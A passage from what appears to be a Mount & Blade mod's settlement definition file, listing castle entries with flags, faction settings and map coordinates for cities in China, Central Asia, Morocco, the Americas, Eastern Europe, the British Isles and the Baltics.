("yichang", "Yichang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-985.8, -71.44), [], 90.0),
("yichun", "Yichun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1020.0, -39.24), [], 180.0),
("tongren", "Tongren", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.76, -38.04), [], 315.0),
("chengdu", "Chengdu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.2, -69.16), [], 90.0),
("jiangzhou", "Jiangzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-933.96, -58.4), [], 80.0),
("hanzhong", "Hanzhong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-939.48, -97.44), [], 115.0),
("fengjie", "Fengjie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-965.64, -74.2), [], 125.0),
("zitong", "Zitong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-918.68, -82.44), [], 65.0),
("kunming", "Kunming", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.32, -7.44), [], 180.0),
("zhushan", "Zhushan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-972.56, -87.88), [], 175.0),
("qujing", "Qujing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-904.0, -13.64), [], 170.0),
("dazhou", "Dazhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-944.04, -76.84), [], 100.0),
("zhaotong", "Zhaotong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-902.68, -34.12), [], 120.0),
("wuzhangyuanzhen", "Wuzhangyuanzhen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-946.08, -111.92), [], 130.0),
("yuexi", "Yuexi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-903.8, -52.6), [], 90.0),
("neijiang", "Neijiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-917.52, -58.44), [], 175.0),
("ankang", "Ankang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-960.68, -94.32), [], 225.0),
("nanchong", "Nanchong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-929.12, -72.68), [], 275.0),
("guiyang", "Guiyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-935.04, -26.16), [], 45.0),
("tangshan", "Tangshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1061.4, -177.32), [], 275.0),
("liaoyang", "Liaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1116.0, -198.2), [], 90.0),
("beiping", "Beiping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1041.88, -181.08), [], 155.0),
("chifeng", "Chifeng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.92, -211.32), [], 155.0),
("yingkou", "Yingkou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1105.8, -190.92), [], 170.0),
("chengde", "Chengde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.04, -194.36), [], 170.0),
("qinhuangdao", "Qinhuangdao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1076.52, -181.72), [], 45.0),
("chaoyang", "Chaoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1086.2, -202.16), [], 155.0),
("marrakech", "Marrakech", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (316.8, -81.6), [], 90.0),
("fez", "Fez", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.6, -109.2), [], 135.0),
("oran", "Oran", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (236.0, -128.0), [], 55.0),
("tangier", "Tangier", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (292.6, -129.08), [], 45.0),
("rabat", "Rabat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (303.88, -108.48), [], 15.0),
("melia", "Melia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.4, -122.0), [], 180.0),
("agadir", "Agadir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (333.0, -67.56), [], 240.0),
("safi", "Safi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (329.2, -89.64), [], 45.0),
("saidia", "Saidia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (254.28, -118.84), [], 180.0),
("meknes", "Meknes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (290.44, -107.68), [], 155.0),
("yinchuan", "Yinchuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-931.2, -163.0), [], 45.0),
("dunhuang", "Dunhuang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-824.0, -186.48), [], 15.0),
("kumul", "Kumul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-792.0, -218.44), [], 225.0),
("zhangye", "Zhangye", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-867.6, -168.72), [], 45.0),
("shanshan", "Shanshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-756.4, -219.04), [], 100.0),
("jiuquan", "Jiuquan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-846.2, -178.84), [], 135.0),
("jinchang", "Jinchang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-887.04, -163.52), [], 225.0),
("bayannuur", "Bayannuur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.36, -191.88), [], 90.0),
("runan", "Runan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.68, -97.8), [], 90.0),
("jiujiang", "Jiujiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1039.08, -60.86), [], 45.0),
("shouxian", "Shouxian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1044.26, -90.84), [], 260.0),
("lujiang", "Lujiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1051.2, -77.56), []),
("fuyang", "Fuyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1035.24, -96.36), [], 45.0),
("hefei", "Hefei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.8, -83.44), [], 35.0),
("xinyang", "Xinyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1016.24, -87.52), [], 130.0),
("anqing", "Anqing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.96, -69.56), [], 240.0),
("xian", "Xian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-960.56, -112.2), [], 170.0),
("lingbao", "Lingbao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-981.64, -115.08), [], 45.0),
("nanyang", "Nanyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.44, -97.32), [], 60.0),
("weinan", "Weinan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.62, -115.58), [], 100.0),
("luanchuan", "Luanchuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-989.64, -106.72), [], 90.0),
("linfen", "Linfen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-988.44, -133.76), [], 90.0),
("almaty", "Almaty", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-610.4, -224.0), [], 80.0),
("taldykrogan", "Taldykrogan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-626.6, -248.0), [], 315.0),
("urumqi", "Urumqi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-728.44, -231.24), [], 260.0),
("bayingol", "Bayingol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-711.2, -204.52), [], 215.0),
("naringol", "Naringol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-646.28, -217.92), []),
("usharal", "Usharal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-654.36, -263.72), [], 275.0),
("changji", "Changji", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-724.24, -234.6), [], 100.0),
("luntai", "Luntai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-694.76, -206.52), [], 100.0),
("kashgar", "Kashgar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-582.97, -176.07), [], 150.0),
("cusco", "Cusco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1015.28, 374.84), [], 70.0),
("quito", "Quito", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1089.6, 249.24), [], 235.0),
("tiwanaku", "Tiwanaku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (973.96, 405.56), [], 125.0),
("cajamarca", "Cajamarca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1086.64, 312.4), [], 45.0),
("lima", "Lima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1070.84, 360.24), [], 125.0),
("cochabamba", "Cochabamba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (951.76, 413.96), [], 115.0),
("chimbote", "Chimbote", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1086.68, 330.72), [], 65.0),
("abancay", "Abancay", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1025.68, 376.16), [], 45.0),
("pisco", "Pisco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1060.8, 376.48), [], 35.0),
("tacna", "Tacna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (996.52, 419.6), [], 115.0),
("tucuman", "Tucuman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (937.6, 459.6), [], 65.0),
("pasto", "Pasto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1062.08, 223.24), [], 240.0),
("sucre", "Sucre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (942.68, 430.32), [], 315.0),
("tenochtitlan", "Tenochtitlan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1307.6, 49.84), [], 85.0),
("teotihuacan", "Teotihuacan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1297.32, -12.4), [], 95.0),
("tikal", "Tikal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.84, 73.12), [], 225.0),
("tegucigalpa", "Tegucigalpa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1182.08, 103.68), [], 115.0),
("tecpan", "Tecpan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1328.2, 72.36), [], 45.0),
("autlan", "Autlan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1369.24, 46.6), [], 15.0),
("texcoco", "Texcoco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1300.0, 22.0), [], 135.0),
("chalco", "Chalco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.52, 72.16), [], 225.0),
("tlacopan", "Tlacopan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1364.32, 21.36), [], 185.0),
("uxmal", "Uxmal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.28, 34.8), [], 90.0),
("acapulco", "Acapulco", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1320.28, 75.64), [], 45.0),
("tecoman", "Tecoman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1363.88, 55.44), [], 135.0),
("managua", "Managua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1171.12, 123.36), [], 225.0),
("veliky_novgorod", "Veliky novgorod", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.16, -462.8), [], 180.0),
("torzhok", "Torzhok", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-152.64, -434.76), [], 55.0),
("smolensk", "Smolensk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.8, -396.4), [], 185.0),
("polatsk", "Polatsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-85.082, -406.94), [], 270.0),
("moscow", "Moscow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.04, -412.4), [], 345.0),
("minsk", "Minsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-71.92, -381.96), [], 115.0),
("velikiye_luki", "Velikiye Luki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-104.16, -423.08), [], 80.0),
("pskov", "Pskov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-80.0, -449.2), [], 240.0),
("kaluga", "Kaluga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.96, -391.84), [], 180.0),
("ryazan", "Ryazan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-203.92, -393.08), [], 255.0),
("halych", "Halych", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-40.8, -306.24), [], 125.0),
("odesa", "Odesa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-105.8, -269.04), [], 155.0),
("chisinau", "Chisinau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-85.48, -276.0), [], 45.0),
("galati", "Galati", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-76.68, -253.84), [], 15.0),
("bacau", "Bacau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-64.52, -269.6), [], 125.0),
("vinnytsia", "Vinnytsia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-81.36, -308.28), []),
("chernivtsi", "Chernivtsi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-53.88, -294.44), [], 240.0),
("lviv", "Lviv", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.72, -317.24), [], 105.0),
("granada", "Granada", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (268.84, -147.28), [], 180.0),
("malaga", "Malaga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (277.68, -141.4), [], 25.0),
("ronda", "Ronda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (284.0, -146.0), [], 260.0),
("motril", "Motril", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (266.12, -144.52), [], 85.0),
("onondaga", "Onondaga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1062.0, -217.36), [], 290.0),
("branford", "Branford", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1021.28, -200.52), [], 175.0),
("bufflo_creek", "Bufflo creek", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1174.16, -190.04), [], 255.0),
("grandriver", "Grandriver", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1117.6, -195.76), [], 115.0),
("ottawa", "Ottawa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1056.52, -253.48), [], 225.0),
("milwaukee", "Milwaukee", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1191.56, -220.72), [], 15.0),
("springfield", "Springfield", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1208.8, -178.68), [], 95.0),
("montreal", "Montreal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1030.56, -255.62), [], 45.0),
("silverspring", "Silverspring", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1075.76, -163.28), [], 275.0),
("quebec", "Quebec", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1008.1, -274.84), [], 315.0),
("chicago", "Chicago", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1186.64, -206.12), [], 180.0),
("mississauga", "Mississauga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1100.64, -228.84), [], 335.0),
("oshkosh", "Oshkosh", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1196.68, -235.0), [], 225.0),
("aksum", "Aksum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-199.93, 107.18), [], 25.0),
("gondar", "Gondar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.15, 117.21), [], 185.0),
("kassala", "Kassala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-165.03, 92.78), [], 50.0),
("mek_ele", "Mek'ele", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-204.78, 111.14), [], 270.0),
("dessie", "Dessie", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-216.83, 135.91), [], 270.0),
("lhasa", "Lhasa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-765.6, -58.8), [], 25.0),
("ngari", "Ngari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-645.2, -91.88), [], 15.0),
("nagqu", "Nagqu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-785.69, -78.82), [], 45.0),
("xigaze", "Xigaze", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-734.78, -58.31), [], 180.0),
("yushu", "Yushu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-839.98, -93.95), [], 120.0),
("skardu", "Skardu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-587.32, -123.49), [], 30.0),
("edinburgh", "Edinburgh", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (265.52, -415.32), [], 45.0),
("glasgo", "Glasgo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.0, -414.8), [], 90.0),
("inverness", "Inverness", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (275.18, -445.72), [], 65.0),
("aberdeen", "Aberdeen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (253.0, -436.8), [], 270.0),
("kirkwall", "Kirkwall", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (261.14, -471.74), [], 65.0),
("stornoway", "Stornoway", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.9, -456.3), [], 180.0),
("dunnegol", "Dunnegol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (317.64, -393.92), [], 180.0),
("dungenen", "Dungenen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (302.88, -391.36), [], 25.0),
("galway", "Galway", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (328.36, -371.0), [], 25.0),
("cork", "Cork", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (322.08, -348.96), [], 25.0),
("carlow", "Carlow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.04, -363.84), [], 160.0),
("waterford", "Waterford", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (307.36, -354.8), [], 55.0),
("erbing", "Erbing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (17.2, -385.6), [], 240.0),
("riga", "Riga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-35.24, -434.74), [], 15.0),
("kaliningrad", "Kaliningrad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.12, -395.28), [], 80.0),
("klaipeda", "Klaipeda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1.88, -412.8), [], 80.0),
("ventspils", "Ventspils", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.64, -440.96), [], 45.0),
("tartu", "Tartu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-62.24, -459.44), [], 315.0),
("parnu", "Parnu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.0, -459.92), [], 25.0),
("jelgava", "Jelgava", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-29.44, -428.2), [], 215.0),
("daugavpils", "Daugavpils", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.4, -414.8), [], 175.0),
("santo_domingo", "Santo domingo", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (997.9, 59.66), [], 35.0),
("south_hedland", "South hedland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.16, 446.68), [], 15.0),
("darwin", "Darwin", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1201.28, 366.12), [], 25.0),
("nashville", "Nashville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1177.16, -134.92), [], 125.0),
("wilmington", "Wilmington", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1080.6, -111.56), [], 180.0),
("saint_augustine", "Saint Augustine", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1119.32, -62.16), [], 280.0),
("oklahoma", "Oklahoma", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1294.36, -126.72), [], 280.0),
("kansas", "Kansas", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1262.32, -171.0), [], 180.0),
("hauston", "Hauston", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1271.24, -61.04), [], 255.0),
("santa_clara", "Santa clara", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1102.24, 19.04), [], 35.0),
("new_orleans", "New orleans", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1214.32, -62.04), [], 45.0),
("rio_de_janeiro", "Rio de janeiro", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (702.2, 470.4), [], 45.0),
("salvador", "Salvador", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (648.64, 366.78), [], 65.0),
